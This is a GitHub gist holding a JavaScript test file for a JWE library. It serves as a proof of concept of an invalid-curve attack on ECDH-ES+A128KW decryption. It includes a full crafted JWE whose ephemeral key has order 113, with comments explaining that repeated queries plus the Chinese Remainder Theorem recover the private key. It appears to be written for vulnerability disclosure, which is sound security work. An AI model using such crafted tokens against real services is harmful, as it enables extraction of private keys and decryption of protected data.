Last active
December 4, 2017 21:13
-
-
Save asanso/fa25685348051ef6a28d49aa0f27a4ae to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "use strict"; | |
| var forEach = require("lodash.foreach"); | |
| var chai = require("chai"); | |
| var JWE = require("../../lib/jwe"), | |
| JWK = require("../../lib/jwk"); | |
| var assert = chai.assert; | |
| describe("jwe/roundtrip", function() { | |
| var vectors = [ | |
| { | |
| desc: "ECDH-ES+A128KW + A128CBC-HS256", | |
| jwk: { | |
| "kty": "EC", | |
| "kid": "3f7b122d-e9d2-4ff7-bdeb-a1487063d799", | |
| "crv": "P-256", | |
| "x": "weNJy2HscCSM6AEDTDg04biOvhFhyyWvOHQfeF_PxMQ", | |
| "y": "e8lnCO-AlStT-NJVX-crhB7QRYhiix03illJOVAOyck", | |
| "d": "VEmDZpDXXK8p8N0Cndsxs924q6nS1RXFASRl6BfUqdw" | |
| }, | |
| alg: "ECDH-ES+A128KW", | |
| enc: "A128CBC-HS256", | |
| plaintext: new Buffer("Gambling is illegal at Bushwood sir, and I never slice.", "utf8") | |
| } | |
| ]; | |
| forEach(vectors, function(v) { | |
| it("test " + v.desc + " encrypt + decrypt", function() { | |
| var promise, | |
| key; | |
| promise = JWK.asKey(v.jwk); | |
| promise = promise.then(function(jwk) { | |
| key = jwk; | |
| var cfg = { | |
| contentAlg: v.enc | |
| }; | |
| var recipient = { | |
| key: key, | |
| header: { | |
| alg: v.alg | |
| } | |
| }; | |
| var jwe = JWE.createEncrypt(cfg, recipient); | |
| return jwe.update(v.plaintext).final(); | |
| }); | |
| promise = promise.then(function(result) { | |
| //The malicious JWE contains a public key with order 113 | |
| var maliciousJWE1 = {}; | |
| maliciousJWE1.protected = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0"; | |
| maliciousJWE1.encrypted_key = "qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg"; | |
| maliciousJWE1.iv = "pEA5kX304PMCOmFSKX_cEg"; | |
| maliciousJWE1.ciphertext = "a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg"; | |
| maliciousJWE1.tag = "72CHiYFecyDvuUa43KKT6w"; | |
| //eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w | |
| assert.ok(result); | |
| var jwe = JWE.createDecrypt(key); | |
| //this proof that jwk.d (the private key) is equals 26 % 113 | |
| //THIS CAN BE DONE MANY TIME | |
| //.... | |
| //AND THAN CHINESE REMAINDER THEOREM FTW | |
| return jwe.decrypt(maliciousJWE1); | |
| }); | |
| promise = promise.then(function(result) { | |
| assert.deepEqual(result.plaintext, v.plaintext); | |
| }); | |
| return promise; | |
| }); | |
| }); | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment